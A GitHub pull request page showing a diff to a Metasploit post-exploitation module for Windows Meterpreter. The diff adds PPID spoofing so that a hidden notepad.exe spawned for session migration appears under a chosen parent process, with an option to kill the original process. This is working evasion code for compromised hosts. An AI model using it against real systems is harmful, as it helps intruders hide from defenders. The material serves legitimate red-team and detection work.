Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add support for PPID spoofing #12736

Open
wants to merge 9 commits into
base: master
from

add support for PPID spoofing to migrate

  • Loading branch information
phra committed Dec 17, 2019
commit f22c6f2f636eb8f61d4739e66591785a8d26fc31
@@ -4,6 +4,8 @@
##

class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::Windows::Process

def initialize(info={})
super( update_info( info,
@@ -12,15 +14,20 @@ def initialize(info={})
to another. A given process PID to migrate to or the module can spawn one and
migrate to that newly spawned process.},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'phra <https://iwantmore.pizza>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))

register_options(
[
OptBool.new( 'SPAWN',[ false,'Spawn process to migrate to. If name for process not given notepad.exe is used.', true]),
OptInt.new( 'PID', [false, 'PID of process to migrate to.']),
OptBool.new( 'SPAWN',[false,'Spawn process to migrate to. If set, notepad.exe is used.', true]),
OptInt.new( 'PID', [false, 'PID of process to migrate to.', 0]),
OptInt.new( 'PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
OptString.new( 'PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
OptString.new( 'NAME', [false, 'Name of process to migrate to.']),
OptBool.new( 'KILL', [false, 'Kill original process for the session.', false])
])
@@ -36,22 +43,21 @@ def run

target_pid = nil

if datastore['SPAWN']
print_status("Spawning notepad.exe process to migrate to")
if datastore['SPAWN'] and datastore['SPAWN'] != ""
target_pid = create_temp_proc
elsif datastore['PID']
elsif datastore['PID'] and datastore['PID'] != 0
target_pid = datastore['PID']
elsif datastore['NAME']
elsif datastore['NAME'] and datastore['NAME'] != ""
target_pid = session.sys.process[datastore['NAME']]
end

if not target_pid or not has_pid?(target_pid)
print_error("Process or PID not found")
print_error("Process #{target_pid} not found")
return
end

begin
print_good("Migrating to #{target_pid}")
print_status("Migrating to #{target_pid}")
session.core.migrate(target_pid)
print_good("Successfully migrated to process #{target_pid}")
rescue ::Exception => e
@@ -61,17 +67,35 @@ def run

if datastore['KILL']
print_status("Killing original process with PID #{original_pid}")
session.sys.process.kill(original_pid)
print_good("Successfully killed process with PID #{original_pid}")
if has_pid?(original_pid)
session.sys.process.kill(original_pid)
print_good("Successfully killed process with PID #{original_pid}")
else
print_warning("PID #{original_pid} exited on its own")
end
end
end

# Creates a temp notepad.exe to migrate to depending the architecture.
def create_temp_proc()
# Use the system path for executable to run
cmd = "notepad.exe"
target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']
cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

print_status("Spawning notepad.exe process to migrate to")

if target_ppid != 0 and not has_pid?(target_ppid)
print_error("Process #{target_ppid} not found")
return
elsif has_pid?(target_ppid)
print_status("Spoofing PPID #{target_ppid}")
end

# run hidden
proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
proc = session.sys.process.execute(cmd, nil, {
'Hidden' => true,
'ParentPid' => target_ppid
})

return proc.pid
end
end
ProTip! Use n and p to navigate between commits in a pull request.
You can’t perform that action at this time.